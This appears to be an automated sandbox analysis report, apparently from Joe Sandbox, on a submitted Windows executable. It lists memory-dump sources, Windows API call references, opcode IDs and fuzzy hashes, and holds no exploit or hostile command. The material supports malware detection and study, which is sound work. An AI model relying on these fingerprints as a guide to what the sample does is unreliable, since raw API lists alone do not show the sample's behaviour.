                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __getptd_noexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3074181302-0
                                                                                                                                                                                                                                                      • Opcode ID: 308be4b8ea1770a853ac0e2ab7ffd50b3bad4d55989f40569e92ca1003e216d3
                                                                                                                                                                                                                                                      • Instruction ID: 2a8271144437eebfb0ddf457180bd34bca715e4609a79e3c4797785d2464c784
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 308be4b8ea1770a853ac0e2ab7ffd50b3bad4d55989f40569e92ca1003e216d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 322181728046CC8BD712BFB6CC453A976E15F41335F252640E4747B2F6DBB48D009BA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4214: FreeLibrary.KERNEL32(00000000,?), ref: 00EC4247
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EC39FE,?,00000001), ref: 00EC41DB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4291: FreeLibrary.KERNEL32(00000000), ref: 00EC42C4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Library$Free$Load
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2391024519-0
                                                                                                                                                                                                                                                      • Opcode ID: 3040ae09a9db44951d3c9f7896faddb5639da8ffcb43746473e080d583074474
                                                                                                                                                                                                                                                      • Instruction ID: c22dec0e4e8a930e160019f37a77b134c1f9abc526959c9762cb31b89c976960
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3040ae09a9db44951d3c9f7896faddb5639da8ffcb43746473e080d583074474
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4211E7B1600306AACB14AB74DE27F9E77E59F40710F10842DF596B71D1DA76DA02AB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                                                                                                      • Opcode ID: dca09983ae4cb2ff8785535fcc9fc1e73332e4ed3dd530fb089b8ab9fc53e8c5
                                                                                                                                                                                                                                                      • Instruction ID: 906bbc51a4fb286dd23081f605993b89a7dbf46dfa5387fa0740f4a5762f4bb3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dca09983ae4cb2ff8785535fcc9fc1e73332e4ed3dd530fb089b8ab9fc53e8c5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D52125705086018FDB24DF68D444B1ABBE1FF84304F18596EE99A6B362C732E846DF52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___lock_fhandle.LIBCMT ref: 00EEAFC0
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7BDA: __getptd_noexit.LIBCMT ref: 00EE7BDA
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1144279405-0
                                                                                                                                                                                                                                                      • Opcode ID: 36fa84e1257d9b43af123f8c828ac141d38429f8d05caab3b47626b93a9edfd2
                                                                                                                                                                                                                                                      • Instruction ID: e4f69e6356a72bfd3235a995ed14f381dc867b0a3f14bc681c092545640921f4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36fa84e1257d9b43af123f8c828ac141d38429f8d05caab3b47626b93a9edfd2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A611B6728046CC8FD7116FA6D8413AB76A19F41335F296250E4743F2E3C7B4AD0097A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00F5DC00,00000000,?,00EC464E,00F5DC00,00010000,00000000,00000000,00000000,00000000), ref: 00ECC337
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                                      • Opcode ID: c5d8448950f76dd89f364b96f658a22e954397a702e2b71ac90460c111cb122b
                                                                                                                                                                                                                                                      • Instruction ID: 33d78cb9397e75f17eba5a66c841b3391f76e2548afbbe3200b8e278b3da548d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5d8448950f76dd89f364b96f658a22e954397a702e2b71ac90460c111cb122b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F114831200B849FD720CE4AD984F66B7E9AF45758F24C41DE4AE96A50C772E846CB60
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                                                      • Opcode ID: e6c6f487e041fcac59e831272422d20e9d2018d4bf7707e35853961444fccb41
                                                                                                                                                                                                                                                      • Instruction ID: 846e5fc66fadebbca651aa08a4795369e0f6559bcae789b9db34b571ad752ac0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6c6f487e041fcac59e831272422d20e9d2018d4bf7707e35853961444fccb41
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A01867150010DAECF05EF74C992DFEBBB4EF10314F108029B562A71E5EA319A4ADB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00EE2AED
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __getptd_noexit__lock_file
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2597487223-0
                                                                                                                                                                                                                                                      • Opcode ID: 9935cd194d8032012ca9fea4bcde6b0f2772adbec44572e29434068e88a23ac3
                                                                                                                                                                                                                                                      • Instruction ID: a5514adb825408c20e8fe83a1f55736a00624e3c0a2a5c520da73101a9f8e54c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9935cd194d8032012ca9fea4bcde6b0f2772adbec44572e29434068e88a23ac3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0C83150028DDADF21AFB68C0239F36E97F40314F146429B518BB191CB748A51DB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,00EC39FE,?,00000001), ref: 00EC4286
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                                      • Opcode ID: 19e0a7da87909169beb00c1268f5343e8aecd3ea54b1443e943c018aa60e9c47
                                                                                                                                                                                                                                                      • Instruction ID: 7ce1a0a1d8321e9fa607e12a09b76e383e7bbe57cec71a8dd2d25713583ace16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19e0a7da87909169beb00c1268f5343e8aecd3ea54b1443e943c018aa60e9c47
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F0A9B1404302CFCB388FA0D8A1D66BBE0BF003293209A3EF1C6A2660C7329940DF40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC40C6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LongNamePath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 82841172-0
                                                                                                                                                                                                                                                      • Opcode ID: 2b373cbb96f756cd1a70b37c6868a3ad0a87324bd848ac092a1b2b98b6efd8ab
                                                                                                                                                                                                                                                      • Instruction ID: 61bf29f575385b4e3b968a66c5105104793f7bfe16a90745fca2744b18d9b27a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b373cbb96f756cd1a70b37c6868a3ad0a87324bd848ac092a1b2b98b6efd8ab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59E0C2366002285BC711A658CC46FEF77EDDFC86A0F0900B9FE09E7244EA64E9819690
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                                                                                                      • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                                                                                                                                                      • Instruction ID: a66e38490483530d62ecc361b6b892ef90626f5479e32337b92a94e562ba63ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BE092B0504B449BD7388B24D800BE3B3E0EB05315F00091CF29A93282EB6278419659
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00F340EA,00000000,00000000,00000000), ref: 00EC47A9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                                      • Opcode ID: cfbd7bd167bd937b1963ba3bc1795a37f5f190fd96098c105bb0dcd756684132
                                                                                                                                                                                                                                                      • Instruction ID: cd7f42b9ea7284f69531bc4ee0d0bf2343df9b582c3f50a6f91128a922d8d7db
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfbd7bd167bd937b1963ba3bc1795a37f5f190fd96098c105bb0dcd756684132
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16D0C97464020CBFFB00CB90DC46F9A7BBCEB45B58F200194FA00A62D0D2F2BE409B55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 0116DAE1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_116b000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                      • Instruction ID: af4c90afde1e862587d09ca887b4c7150ec0a596b50f23142eed96e3ecfeed93
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE0E67494410EDFDB00EFF8D54969E7FB4EF04301F1001A1FD01D2281DB719D608A62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00F2F87D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F2F8DC
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F2F919
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F2F940
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2F966
                                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 00F2F9D2
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00F2F9F3
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000009), ref: 00F2FA00
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F2FA16
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 00F2FA20
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F2FA4F
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2FA72
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001030,?,00F2E059), ref: 00F2FB6F
                                                                                                                                                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00F2FB85
                                                                                                                                                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F2FB96
                                                                                                                                                                                                                                                      • SetCapture.USER32(?), ref: 00F2FB9F
                                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00F2FC03
                                                                                                                                                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F2FC0F
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00F2FC29
                                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 00F2FC34
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F2FC69
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00F2FC76
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F2FCD8
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2FD02
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F2FD41
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2FD6C
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F2FD84
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F2FD8F
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F2FDB0
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00F2FDBD
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00F2FDD9
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F2FE3F
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2FE6F
                                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00F2FEC5
                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F2FEF1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F2FF19
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2FF3C
                                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00F2FF86
                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F2FFB6
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F3004B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
